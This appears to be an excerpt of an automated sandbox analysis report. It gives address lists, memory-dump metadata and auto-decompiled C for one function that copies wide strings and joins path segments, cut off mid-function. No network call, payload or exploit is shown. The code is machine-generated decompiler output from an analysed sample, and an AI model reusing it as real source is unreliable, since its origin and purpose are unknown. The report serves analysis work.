0x008b7b4c
0x008b7b4d
0x008b7b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7b4f
0x008b7b46
0x008b7b3d
0x008b7ba4
0x008b7ba4
0x008b7ba4
0x008b7ba8
0x008b7baa
0x008b7bd0
0x008b7bd3
0x008b7bd6
0x008b7bda
0x00000000
0x00000000
0x00000000
0x008b7bac
0x008b7bac
0x008b7bae
0x008b7fa2
0x008b7fa7
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7bb4
0x008b7bb4
0x008b7bb7
0x008b7bb9
0x008b7bbe
0x008b7fa9
0x008b7fa9
0x008b7be0
0x008b7bea
0x008b7bed
0x008b7bf1
0x008b7bf1
0x008b7bf6
0x008b7bfe
0x008b7bfe
0x008b7bfe
0x008b7bff
0x008b7c0b
0x008b7c0e
0x008b7c12
0x008b7c13
0x008b7c17
0x008b7c1c
0x008b7c20
0x008b7c24
0x008b7c27
0x008b7c29
0x008b7c7f
0x008b7c2b
0x008b7c2b
0x008b7c30
0x008b7c32
0x008b7c34
0x008b7c37
0x008b7c39
0x008b7c3b
0x008b7c3d
0x008b7c41
0x008b7c41
0x008b7c43
0x008b7c47
0x008b7c47
0x008b7c48
0x008b7c4d
0x008b7c51
0x008b7c53
0x00000000
0x00000000
0x008b7c55
0x008b7c59
0x008b7c5c
0x008b7c5e
0x00000000
0x00000000
0x00000000
0x008b7c5e
0x008b7c60
0x008b7c64
0x008b7c64
0x008b7c3b
0x008b7c68
0x008b7c6a
0x008b7c6b
0x008b7c6f
0x008b7c74
0x008b7c78
0x008b7c78
0x008b7c82
0x008b7c86
0x008b7c86
0x008b7c88
0x008b7c8a
0x00000000
0x008b7c90
0x008b7c90
0x00000000
0x008b7c90
0x008b7bc4
0x008b7bc4
0x008b7c93
0x008b7c93
0x008b7c95
0x008b7c97
0x008b7c9b
0x008b7c9b
0x008b7c9d
0x008b7c9d
0x008b7c9e
0x008b7ca1
0x008b7ca5
0x008b7ca8
0x00000000
0x00000000
0x008b7caa
0x008b7cac
0x008b7caf
0x00000000
0x00000000
0x00000000
0x008b7caf
0x008b7cb1
0x008b7cb1
0x008b7cb5
0x008b7cb7
0x008b7cb9
0x008b7cc2
0x00000000
0x00000000
0x008b7cbb
0x008b7cbb
0x008b7cc4
0x008b7cc4
0x008b7ccc
0x008b7cd0
0x008b7cd4
0x008b7cd8
0x008b7cd8
0x008b7cdc
0x008b7cdf
0x008b7ce1
0x00000000
0x00000000
0x008b7ce3
0x008b7ce3
0x008b7ce7
0x008b7ce8
0x008b7cea
0x00000000
0x00000000
0x00000000
0x008b7cea
0x008b7cec
0x008b7cf0
0x008b7cf0
0x00000000
0x008b7cb9
0x008b7bbe
0x008b7bae
0x008b7baa
0x00000000
0x00000000
0x00000000
0x008b7ab1
0x00000000
0x008b7ab3
0x008b7ab7
0x008b7ab8
0x008b7ab8
0x00000000
0x008b7f41
0x008b7f45
0x008b7f46
0x008b7f46
0x008b7f4e
0x008b7f53
0x008b7f55
0x008b7e4b
0x008b7e4b
0x008b7e52
0x008b7e54
0x008b7e5a
0x008b7e5c
0x008b7e5e
0x008b7e95
0x008b7e60
0x008b7e60
0x008b7e62
0x008b7e64
0x008b7e67
0x008b7e69
0x008b7e6b
0x008b7e6d
0x008b7e6d
0x008b7e6f
0x008b7e6f
0x008b7e70
0x008b7e75
0x008b7e79
0x008b7e7b
0x00000000
0x00000000
0x008b7e7d
0x008b7e81
0x008b7e84
0x008b7e86
0x00000000
0x00000000
0x00000000
0x008b7e86
0x008b7e6f
0x008b7e6b
0x008b7e88
0x008b7e88
0x008b7e8a
0x008b7e8b
0x008b7e90
0x008b7e90
0x008b7e98
0x008b7e9b
0x008b7e9d
0x00000000
0x008b7cf4
0x008b7cf8
0x008b7cf9
0x008b7cfc
0x008b7cfc
0x008b7d04
0x008b7d04
0x008b7d07
0x008b7d07
0x008b7d09
0x008b7d0b
0x008b7d0e
0x008b7d0e
0x008b7d11
0x00000000
0x008b7d17
0x008b7d19
0x008b7d19
0x008b7d1c
0x008b7d30
0x008b7d34
0x008b7d40
0x008b7d40
0x008b7d46
0x008b7d46
0x008b7d4b
0x008b7d4f
0x008b7d53
0x008b7d55
0x00000000
0x00000000
0x008b7d5b
0x008b7d5e
0x008b7d60
0x00000000
0x008b7d62
0x008b7d62
0x008b7d68
0x008b7d79
0x008b7d79
0x00000000
0x008b7d6a
0x008b7d6a
0x008b7d6e
0x00000000
0x00000000
0x008b7d70
0x008b7d71
0x008b7d77
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7d77
0x008b7d6a
0x008b7d68
0x00000000
0x008b7d60
0x008b7ec1
0x008b7ec4
0x008b7d1e
0x008b7d20
0x008b7d22
0x008b7d22
0x008b7d25
0x008b7d25
0x008b7d29
0x00000000
0x00000000
0x008b7d2b
0x008b7d2c
0x008b7d2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7d2e
0x008b7d25
0x008b7d7e
0x008b7d83
0x008b7d83
0x008b7d86
0x008b7d89
0x008b7d8c
0x008b7d8e
0x008b7da1
0x008b7da4
0x008b7da4
0x008b7daa
0x008b7db2
0x008b7db2
0x008b7db2
0x008b7db5
0x008b7dbc
0x008b7dbf
0x008b7dc5
0x008b7dc7
0x008b7dcd
0x008b7dcf
0x008b7dd1
0x008b7e20
0x008b7dd3
0x008b7dd3
0x008b7dd5
0x008b7dd7
0x008b7dda
0x008b7ddc
0x008b7dde
0x008b7de0
0x008b7de2
0x008b7de5
0x008b7de9
0x008b7deb
0x008b7deb
0x008b7dec
0x008b7df1
0x008b7df5
0x008b7df7
0x00000000
0x00000000
0x008b7df9
0x008b7dfd
0x008b7e00
0x008b7e02
0x00000000
0x00000000
0x00000000
0x008b7e02
0x008b7e04
0x008b7e07
0x008b7e07
0x008b7dde
0x008b7e0b
0x008b7e0d
0x008b7e0e
0x008b7e12
0x008b7e17
0x008b7e1b
0x008b7e1b
0x008b7e23
0x008b7e26
0x008b7e29
0x008b7d90
0x008b7d90
0x008b7d90
0x008b7e2b
0x008b7e2d
0x008b7e2f
0x008b7e31
0x008b7e37
0x008b7e37
0x008b7e3a
0x008b7e3b
0x008b7e3d
0x008b7e3f
0x00000000
0x00000000
0x008b7e41
0x008b7e43
0x008b7ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x008b7e45
0x008b7e45
0x008b7e47
0x008b7e35
0x008b7e36
0x008b7e36
0x00000000
0x008b7e36
0x00000000
0x008b7e47
0x008b7e37
0x008b7e2f
0x008b7d11
0x008b779f
0x008b7798
0x008b76f5
0x008b7ea4
0x008b7ea4
0x008b7ea6
0x008b7ea7
0x008b7eb8
0x008b7674
0x008b7674
0x008b7679
0x008b767b
0x008b767d
0x008b7685
0x008b7687
0x008b768d
0x008b7691
0x008b76c8
0x008b7693
0x008b7695
0x008b7697
0x008b769a
0x008b769e
0x008b76a0
0x008b76a2
0x008b76a2
0x008b76a3
0x008b76a8
0x008b76ae
0x00000000
0x00000000
0x008b76b0
0x008b76b4
0x008b76b9
0x00000000
0x00000000
0x00000000
0x008b76b9
0x008b76a2
0x008b769e
0x008b76bb
0x008b76bb
0x008b76bd
0x008b76be
0x008b76c3
0x008b76c3
0x008b76cb
0x008b76ce
0x008b76d5
0x008b76e0
0x008b76e0
0x00000000

Strings

@, xrefs: 008B7FA2

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction ID: e1ed387960be29478869b4d8f792fad3fd649fc66a7debd239ff75cc54d2f6b9
Opcode Fuzzy Hash: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction Fuzzy Hash: E952F771A0C7528BD7268E38C4903AA7BD2FFD6354F28866DE895DB392DA34CD41C781

Uniqueness

Uniqueness Score: -1.00%

Function 008AD030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008AD030(void* __ecx, signed int* _a4) {
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _t225;
				signed int _t230;
				signed int _t231;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				unsigned int _t267;
				signed int _t272;
				signed int _t277;
				unsigned int _t283;
				signed int _t284;
				signed int* _t286;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t304;
				unsigned int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed int _t313;
				signed int _t316;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				unsigned int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t382;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t390;
				unsigned int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed short* _t414;
				signed int _t418;
				unsigned int _t419;
				signed int _t421;
				unsigned int _t429;
				void* _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int* _t445;
				unsigned int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t458;
				signed int _t465;
				unsigned int _t467;
				signed int _t468;
				signed int _t471;
				void* _t473;
				void* _t474;

				_t473 = (_t471 & 0xfffffff0) - 0x34;
				E008AD980(__ecx,  &_v60, 0x2f);
				_t294 = E008AE7D0( &_v60);
				_t445 = _a4;
				_t316 =  *_t294;
				if(_t316 != 0) {
					_t364 =  *( *( *(_t294 + 4)));
					__eflags = _t364;
					if(_t364 == 0) {
						L37:
						_push(0x80);
						_t418 = E008A1030();
						_t473 = _t473 + 4;
						 *_t418 = 0;
						__eflags =  *_t294 - 1;
						if( *_t294 <= 1) {
							L70:
							 *_t445 = 0;
							_t445[1] = 0;
							__eflags = _t418;
							if(_t418 == 0) {
								L105:
								_push(0x80);
								_t295 = E008A1030();
								_t473 = _t473 + 4;
								_t317 =  *_t445;
								__eflags = _t317;
								if(_t317 == 0) {
									__eflags = 0;
									 *_t295 = 0;
									L113:
									 *_t445 = _t295;
									_t445[1] = 0x40;
									L114:
									_push(2);
									_push(_t418);
									E008A10B0();
									_t474 = _t473 + 8;
									L115:
									_t419 = _v60;
									_v60 = 0;
									_v52 = 0;
									_t369 = _v56;
									if(_t419 <= 0) {
										L127:
										_push(4);
										_push(_t369);
										E008A10B0();
										_v56 = 0;
										return _t445;
									}
									_t225 = _t419 >> 1;
									if(_t225 == 0) {
										_t297 = 1;
										L124:
										if(_t297 - 1 < _t419) {
											_t319 =  *((intOrPtr*)(_t369 + _t297 * 4 - 4));
											if( *((intOrPtr*)(_t369 + _t297 * 4 - 4)) != 0) {
												_push(1);
												E008A87E0(_t319);
												_t369 = _v60;
											}
										}
										goto L127;
									}
									_t298 = 0;
									_t447 = _t225;
									do {
										_t320 =  *((intOrPtr*)(_t369 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + _t298 * 8)) != 0) {
											_push(1);
											E008A87E0(_t320);
											_t369 = _v60;
										}
										_t321 =  *((intOrPtr*)(_t369 + 4 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + 4 + _t298 * 8)) != 0) {
											_push(1);
											E008A87E0(_t321);
											_t369 = _v60;
										}
										_t298 = _t298 + 1;
									} while (_t298 < _t447);
									_t445 = _a4;
									_t297 = _t298 + _t298 + 1;
									goto L124;
								}
								__eflags = _t295;
								if(_t295 == 0) {
									L111:
									_push(2);
									_push(_t317);
									E008A10B0();
									_t473 = _t473 + 8;
									goto L113;
								}
								_t370 =  *_t317 & 0x0000ffff;
								 *_t295 = _t370;
								__eflags = _t370;
								if(_t370 == 0) {
									goto L111;
								}
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_t371 = _t371 + 1;
									_t230 =  *(_t317 + _t371 * 4 - 2) & 0x0000ffff;
									 *(_t295 + _t371 * 4 - 2) = _t230;
									__eflags = _t230;
									if(_t230 == 0) {
										goto L111;
									}
									_t231 =  *(_t317 + _t371 * 4) & 0x0000ffff;
									 *(_t295 + _t371 * 4) = _t231;
									__eflags = _t231;
									if(_t231 != 0) {
										continue;
									}
									goto L111;
								}
								goto L111;
							}
							L71:
							__eflags =  *_t418 & 0x0000ffff;
							if(( *_t418 & 0x0000ffff) == 0) {
								goto L105;
							}
							_t374 = _t418 & 0x0000000f;
							__eflags = _t374;
							if(_t374 == 0) {
								L77:
								asm("pxor xmm0, xmm0");
								_t304 =  ~( ~_t374 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t304;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ecx, xmm1");
									__eflags = _t316;
									if(_t316 != 0) {
										break;
									}
									_t374 = _t374 + 8;
									__eflags = _t374 - _t304;
									if(_t374 < _t304) {
										continue;
									}
									__eflags = _t304 - 0x7fffffff;
									if(_t304 >= 0x7fffffff) {
										L83:
										_t304 = 0x7fffffff;
										L84:
										_t82 = _t304 + 1; // 0x80000000
										_t232 = _t82;
										__eflags = _t232 - 0x40;
										_t233 =  <=  ? 0x40 : _t232;
										__eflags = _t233;
										if(_t233 > 0) {
											_t326 = (_t233 >> 5 >> 0x1a) + _t233 >> 6;
											_t234 = _t233 & 0x8000003f;
											__eflags = _t234;
											if(_t234 < 0) {
												_t234 = (_t234 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t234;
											}
											__eflags = _t234;
											_t327 = _t326 + (0 | _t234 > 0x00000000);
											_v64 = _t327 << 6;
											_push(_t327 << 7);
											_t235 = E008A1030();
											_t473 = _t473 + 4;
											_t329 =  *_t445;
											__eflags = _t329;
											if(_t329 == 0) {
												__eflags = 0;
												 *_t235 = 0;
												goto L97;
											} else {
												__eflags = _t235;
												if(_t235 == 0) {
													L95:
													_push(2);
													_push(_t329);
													_v68 = _t235;
													E008A10B0();
													_t235 = _v68;
													_t473 = _t473 + 8;
													L97:
													_t445[1] = _v64;
													 *_t445 = _t235;
													L98:
													_t330 = _t418;
													__eflags = _t235;
													if(_t235 == 0) {
														goto L114;
													}
													_t382 = 0;
													while(1) {
														_t448 =  *_t330 & 0x0000ffff;
														_t382 = _t382 + 1;
														 *_t235 = _t448;
														__eflags = _t304;
														if(_t304 == 0) {
															goto L103;
														}
														__eflags = _t382 - _t304;
														if(_t382 == _t304) {
															_t445 = _a4;
															 *(_t235 + 2) = 0;
															goto L114;
														}
														L103:
														__eflags = _t448;
														if(_t448 == 0) {
															_t445 = _a4;
															goto L114;
														}
														_t235 = _t235 + 2;
														_t330 = _t330 + 2;
														__eflags = _t330;
													}
												}
												_t384 =  *_t329 & 0x0000ffff;
												 *_t235 = _t384;
												__eflags = _t384;
												if(_t384 == 0) {
													goto L95;
												}
												_t385 = 0;
												__eflags = 0;
												while(1) {
													_t385 = _t385 + 1;
													_t449 =  *(_t329 + _t385 * 4 - 2) & 0x0000ffff;
													 *(_t235 + _t385 * 4 - 2) = _t449;
													__eflags = _t449;
													if(_t449 == 0) {
														break;
													}
													_t450 =  *(_t329 + _t385 * 4) & 0x0000ffff;
													 *(_t235 + _t385 * 4) = _t450;
													__eflags = _t450;
													if(_t450 != 0) {
														continue;
													}
													break;
												}
												_t445 = _a4;
												goto L95;
											}
										}
										_t235 = 0;
										goto L98;
									} else {
										goto L81;
									}
									while(1) {
										L81:
										__eflags =  *(_t418 + _t304 * 2) & 0x0000ffff;
										if(( *(_t418 + _t304 * 2) & 0x0000ffff) == 0) {
											goto L84;
										}
										_t304 = _t304 + 1;
										__eflags = _t304 - 0x7fffffff;
										if(_t304 < 0x7fffffff) {
											continue;
										}
										goto L83;
									}
									goto L84;
								}
								asm("bsf ebx, ecx");
								_t304 = (_t304 >> 1) + _t374;
								goto L84;
							}
							_t304 = 0;
							__eflags = _t374 & 0x00000001;
							if((_t374 & 0x00000001) != 0) {
								goto L81;
							}
							_t374 =  ~_t374 + 0x10 >> 1;
							__eflags = _t374;
							while(1) {
								_t316 =  *(_t418 + _t304 * 2) & 0x0000ffff;
								__eflags = _t316;
								if(_t316 == 0) {
									goto L84;
								}
								_t304 = _t304 + 1;
								__eflags = _t304 - _t374;
								if(_t304 < _t374) {
									continue;
								}
								goto L77;
							}
							goto L84;
						}
						_v40 = 0x40;
						L39:
						__eflags = 1;
						_t389 = 1;
						_t241 = _t294;
						asm("pxor xmm0, xmm0");
						_t306 = 1;
						do {
							__eflags = _t418;
							if(_t418 == 0) {
								_t390 = 0;
								L205:
								_v32 = _t241;
								_t451 = _t390;
								L54:
								_t48 = _t451 + 2; // -2147483652
								_t331 = _t48;
								__eflags = _t331 - 0x40;
								_t332 =  <=  ? 0x40 : _t331;
								__eflags = _t332 - _v40;
								if(_t332 <= _v40) {
									L66:
									_t316 = 0;
									 *((short*)(_t418 + _t451 * 2)) = 0x5c;
									 *((short*)(_t418 + 2 + _t451 * 2)) = 0;
									_t452 = _v32;
									_t389 =  *( *( *((intOrPtr*)(_t452 + 4)) + _t306 * 4));
									__eflags = _t389;
									if(_t389 == 0) {
										goto L68;
									}
									_t316 =  *_t389 & 0x0000ffff;
									__eflags = _t316;
									if(_t316 != 0) {
										__eflags = _t389 - _t418;
										if(_t389 == _t418) {
											goto L68;
										}
										_t245 = _t389 & 0x0000000f;
										__eflags = _t245;
										if(_t245 == 0) {
											L134:
											asm("pxor xmm1, xmm1");
											_t465 =  ~( ~_t245 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t465;
											while(1) {
												asm("movdqu xmm0, [edx+eax*2]");
												asm("pcmpeqw xmm0, xmm1");
												asm("pmovmskb ecx, xmm0");
												__eflags = _t316;
												if(_t316 != 0) {
													break;
												}
												_t245 = _t245 + 8;
												__eflags = _t245 - _t465;
												if(_t245 < _t465) {
													continue;
												}
												__eflags = _t465 - 0x7fffffff;
												if(_t465 >= 0x7fffffff) {
													L140:
													_t465 = 0x7fffffff;
													L141:
													__eflags = _t418;
													if(_t418 == 0) {
														_t246 = 0;
														L155:
														_t149 = _t246 + 1; // 0x80000000
														_t247 = _t465 + _t149;
														__eflags = _t247;
														if(_t247 != 0) {
															__eflags = _t247 - 0x40;
															_t248 =  <=  ? 0x40 : _t247;
															__eflags = _t248 - _v40;
															if(_t248 <= _v40) {
																L173:
																_t249 = _t418;
																__eflags = _t418;
																if(_t418 == 0) {
																	L204:
																	_t241 = _v32;
																	_t390 = 0;
																	_t306 = _t306 + 1;
																	__eflags = _t306 -  *_t241;
																	if(_t306 >=  *_t241) {
																		_t445 = _a4;
																		 *_t445 = 0;
																		_t445[1] = 0;
																		goto L105;
																	}
																	goto L205;
																}
																_t334 =  *_t418 & 0x0000ffff;
																L175:
																__eflags = _t334;
																if(_t334 == 0) {
																	L180:
																	_t335 = _t249;
																	__eflags = _t465;
																	if(__eflags != 0) {
																		if(__eflags <= 0) {
																			L187:
																			_t316 = _v32;
																			_t389 = 0;
																			 *_t249 = 0;
																			_t306 = _t306 + 1;
																			__eflags = _t306 -  *_t316;
																			if(_t306 <  *_t316) {
																				L42:
																				_t243 = _t418 & 0x0000000f;
																				__eflags = _t243;
																				if(_t243 == 0) {
																					L47:
																					asm("pxor xmm1, xmm1");
																					_t458 =  ~( ~_t243 + 0x00000007 & 0x00000007) + 0x7fffffff;
																					__eflags = _t458;
																					while(1) {
																						asm("movdqu xmm0, [edi+eax*2]");
																						asm("pcmpeqw xmm0, xmm1");
																						asm("pmovmskb edx, xmm0");
																						__eflags = _t389;
																						if(_t389 != 0) {
																							break;
																						}
																						_t243 = _t243 + 8;
																						__eflags = _t243 - _t458;
																						if(_t243 < _t458) {
																							continue;
																						}
																						__eflags = _t458 - 0x7fffffff;
																						if(_t458 >= 0x7fffffff) {
																							L53:
																							_t451 = 0x7fffffff;
																							goto L54;
																						} else {
																							goto L51;
																						}
																						while(1) {
																							L51:
																							__eflags =  *(_t418 + _t458 * 2) & 0x0000ffff;
																							if(( *(_t418 + _t458 * 2) & 0x0000ffff) == 0) {
																								break;
																							}
																							_t458 = _t458 + 1;
																							__eflags = _t458 - 0x7fffffff;
																							if(_t458 < 0x7fffffff) {
																								continue;
																							}
																							goto L53;
																						}
																						L196:
																						__eflags = _t451 - 0xfffffffe;
																						if(_t451 == 0xfffffffe) {
																							 *_t418 = 0;
																						}
																						goto L54;
																					}
																					asm("bsf esi, edx");
																					_t451 = (_t458 >> 1) + _t243;
																					goto L196;
																				}
																				_t458 = 0;
																				__eflags = _t243 & 0x00000001;
																				if((_t243 & 0x00000001) != 0) {
																					goto L51;
																				}
																				_t243 =  ~_t243 + 0x10 >> 1;
																				__eflags = _t243;
																				while(1) {
																					_t389 =  *(_t418 + _t458 * 2) & 0x0000ffff;
																					__eflags = _t389;
																					if(_t389 == 0) {
																						goto L196;
																					}
																					_t458 = _t458 + 1;
																					__eflags = _t458 - _t243;
																					if(_t458 < _t243) {
																						continue;
																					}
																					goto L47;
																				}
																				goto L196;
																			}
																			_t445 = _a4;
																			L192:
																			 *_t445 = 0;
																			_t445[1] = 0;
																			goto L71;
																		}
																		L183:
																		_v48 = 0;
																		_v44 = _t418;
																		_v28 = _t306;
																		_t421 = _v48;
																		while(1) {
																			_t307 =  *(_t389 + _t421 * 2) & 0x0000ffff;
																			 *(_t335 + _t421 * 2) = _t307;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				break;
																			}
																			_t190 = _t421 * 2; // 0x2
																			_t249 = _t335 + _t190 + 2;
																			_t421 = _t421 + 1;
																			__eflags = _t421 - _t465;
																			if(_t421 < _t465) {
																				continue;
																			}
																			break;
																		}
																		_t306 = _v28;
																		_t418 = _v44;
																		goto L187;
																	}
																	_t465 = 0x7fffffff;
																	goto L183;
																}
																_v36 = _t389;
																_t336 = 0;
																__eflags = 0;
																_v28 = _t306;
																while(1) {
																	_t336 = _t336 + 1;
																	_t308 = _t418 + _t336 * 4;
																	_t249 = _t308 - 2;
																	__eflags =  *(_t308 - 2) & 0x0000ffff;
																	if(( *(_t308 - 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t249 = _t308;
																	__eflags =  *_t308 & 0x0000ffff;
																	if(( *_t308 & 0x0000ffff) != 0) {
																		continue;
																	}
																	break;
																}
																_t389 = _v36;
																_t306 = _v28;
																goto L180;
															}
															L161:
															_t341 = (_t248 >> 5 >> 0x1a) + _t248 >> 6;
															_t250 = _t248 & 0x8000003f;
															__eflags = _t250;
															if(_t250 < 0) {
																_t250 = (_t250 - 0x00000001 | 0xffffffc0) + 1;
																__eflags = _t250;
															}
															__eflags = _t250;
															_t342 = _t341 + (0 | _t250 > 0x00000000);
															_v40 = _t342 << 6;
															_push(_t342 << 7);
															_v36 = _t389;
															_t255 = E008A1030();
															_t389 = _v36;
															_t344 = _t255;
															_t473 = _t473 + 4;
															__eflags = _t418;
															if(_t418 == 0) {
																__eflags = 0;
																 *_t344 = 0;
																goto L172;
															} else {
																__eflags = _t344;
																if(_t344 == 0) {
																	L170:
																	_push(2);
																	_push(_t418);
																	_v68 = _t344;
																	_v36 = _t389;
																	E008A10B0();
																	_t389 = _v36;
																	_t344 = _v68;
																	_t473 = _t473 + 8;
																	L172:
																	_t418 = _t344;
																	goto L173;
																}
																_t257 =  *_t418 & 0x0000ffff;
																 *_t344 = _t257;
																__eflags = _t257;
																if(_t257 == 0) {
																	goto L170;
																}
																_v28 = _t306;
																_t258 = 0;
																__eflags = 0;
																while(1) {
																	_t258 = _t258 + 1;
																	_t309 =  *(_t418 + _t258 * 4 - 2) & 0x0000ffff;
																	 *(_t344 + _t258 * 4 - 2) = _t309;
																	__eflags = _t309;
																	if(_t309 == 0) {
																		break;
																	}
																	_t310 =  *(_t418 + _t258 * 4) & 0x0000ffff;
																	 *(_t344 + _t258 * 4) = _t310;
																	__eflags = _t310;
																	if(_t310 != 0) {
																		continue;
																	}
																	break;
																}
																_t306 = _v28;
																goto L170;
															}
														}
														__eflags = _t418;
														if(_t418 == 0) {
															__eflags = _v40 - 0x40;
															if(_v40 < 0x40) {
																L159:
																_t248 = 0x40;
																goto L161;
															}
															goto L204;
														}
														_t334 = 0;
														 *_t418 = 0;
														__eflags = _v40 - 0x40;
														if(_v40 < 0x40) {
															goto L159;
														}
														_t249 = _t418;
														goto L175;
													}
													_t346 = _t418 & 0x0000000f;
													__eflags = _t346;
													if(_t346 == 0) {
														L148:
														asm("pxor xmm1, xmm1");
														_v28 = _t306;
														_t246 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
														__eflags = _t246;
														while(1) {
															asm("movdqu xmm0, [edi+ecx*2]");
															asm("pcmpeqw xmm0, xmm1");
															asm("pmovmskb ebx, xmm0");
															__eflags = _t306;
															if(_t306 != 0) {
																break;
															}
															_t346 = _t346 + 8;
															__eflags = _t346 - _t246;
															if(_t346 < _t246) {
																continue;
															}
															_t306 = _v28;
															__eflags = _t246 - 0x7fffffff;
															if(_t246 >= 0x7fffffff) {
																L154:
																_t246 = 0x7fffffff;
																goto L155;
															} else {
																goto L152;
															}
															while(1) {
																L152:
																__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
																if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
																	goto L155;
																}
																_t246 = _t246 + 1;
																__eflags = _t246 - 0x7fffffff;
																if(_t246 < 0x7fffffff) {
																	continue;
																}
																goto L154;
															}
															goto L155;
														}
														asm("bsf eax, eax");
														_t267 = _t306 >> 1;
														_t306 = _v28;
														_t246 = _t267 + _t346;
														goto L155;
													}
													_t246 = 0;
													__eflags = _t346 & 0x00000001;
													if((_t346 & 0x00000001) != 0) {
														goto L152;
													}
													_t346 =  ~_t346 + 0x10 >> 1;
													__eflags = _t346;
													_v28 = _t306;
													while(1) {
														__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
														if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t246 = _t246 + 1;
														__eflags = _t246 - _t346;
														if(_t246 < _t346) {
															continue;
														}
														_t306 = _v28;
														goto L148;
													}
													_t306 = _v28;
													goto L155;
												} else {
													goto L138;
												}
												while(1) {
													L138:
													__eflags =  *(_t389 + _t465 * 2) & 0x0000ffff;
													if(( *(_t389 + _t465 * 2) & 0x0000ffff) == 0) {
														goto L141;
													}
													_t465 = _t465 + 1;
													__eflags = _t465 - 0x7fffffff;
													if(_t465 < 0x7fffffff) {
														continue;
													}
													goto L140;
												}
												goto L141;
											}
											asm("bsf esi, ecx");
											_t465 = (_t465 >> 1) + _t245;
											goto L141;
										}
										_t465 = 0;
										__eflags = _t245 & 0x00000001;
										if((_t245 & 0x00000001) != 0) {
											goto L138;
										}
										_t245 =  ~_t245 + 0x10 >> 1;
										__eflags = _t245;
										while(1) {
											_t316 =  *(_t389 + _t465 * 2) & 0x0000ffff;
											__eflags = _t316;
											if(_t316 == 0) {
												goto L141;
											}
											_t465 = _t465 + 1;
											__eflags = _t465 - _t245;
											if(_t465 < _t245) {
												continue;
											}
											goto L134;
										}
										goto L141;
									}
									goto L68;
								}
								_t405 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
								_t351 = _t332 & 0x8000003f;
								__eflags = _t351;
								if(_t351 < 0) {
									_t351 = (_t351 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t351;
								}
								__eflags = _t351;
								_t406 = _t405 + (0 | _t351 > 0x00000000);
								_v40 = _t406 << 6;
								_push(_t406 << 7);
								_t272 = E008A1030();
								_t473 = _t473 + 4;
								__eflags = _t418;
								if(_t418 == 0) {
									__eflags = 0;
									 *_t272 = 0;
									goto L65;
								} else {
									__eflags = _t272;
									if(_t272 == 0) {
										L63:
										_push(2);
										_push(_t418);
										_v64 = _t272;
										E008A10B0();
										_t272 = _v64;
										_t473 = _t473 + 8;
										L65:
										_t418 = _t272;
										goto L66;
									}
									_t409 =  *_t418 & 0x0000ffff;
									 *_t272 = _t409;
									__eflags = _t409;
									if(_t409 == 0) {
										goto L63;
									}
									_t410 = 0;
									__eflags = 0;
									while(1) {
										_t410 = _t410 + 1;
										_t354 =  *(_t418 + _t410 * 4 - 2) & 0x0000ffff;
										 *(_t272 + _t410 * 4 - 2) = _t354;
										__eflags = _t354;
										if(_t354 == 0) {
											goto L63;
										}
										_t355 =  *(_t418 + _t410 * 4) & 0x0000ffff;
										 *(_t272 + _t410 * 4) = _t355;
										__eflags = _t355;
										if(_t355 != 0) {
											continue;
										}
										goto L63;
									}
									goto L63;
								}
							}
							_v32 = _t241;
							goto L42;
							L68:
							_t241 = _t452;
							_t306 = _t306 + 1;
							__eflags = _t306 -  *_t241;
						} while (_t306 <  *_t241);
						_t445 = _a4;
						goto L70;
					}
					__eflags =  *_t364 & 0x0000ffff;
					if(( *_t364 & 0x0000ffff) == 0) {
						goto L37;
					}
					_t277 = _t364 & 0x0000000f;
					__eflags = _t277;
